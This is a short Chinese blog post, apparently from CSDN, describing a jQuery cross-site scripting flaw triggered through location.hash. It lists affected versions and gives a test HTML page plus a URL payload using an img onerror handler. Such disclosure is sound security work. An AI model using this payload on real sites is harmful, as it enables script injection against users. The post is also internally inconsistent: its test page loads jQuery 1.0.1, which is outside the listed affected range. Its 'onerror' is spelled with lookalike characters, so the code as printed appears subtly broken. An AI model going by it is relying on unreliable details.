JQuery跨站脚本漏洞

原理:

    jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞

影响版本:

  •     jquery-1.7.1~1.8.3
  •     jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js
  •     jquery-1.5所有版本
  •     jquery-1.4所有版本
  •     jquery-1.3所有版本
  •     jquery-1.2所有版本

测试代码:

<html>
<head>
    <title>JQuery-xss-test</title>
    <script  src="https://code.jquery.com/jquery-1.0.1.js" ></script>
    <script>
    $(function(){
    try { $(location.hash) } 
    catch(e) {}
    })
    </script>
</head>
<body>
    Jquery xss test.
</body>
</html>

然后访问如下:http://localhost/#<img src=/ οnerrοr=alert(1)>

在线测试平台:JQuery跨站脚本在线测试

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 19.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值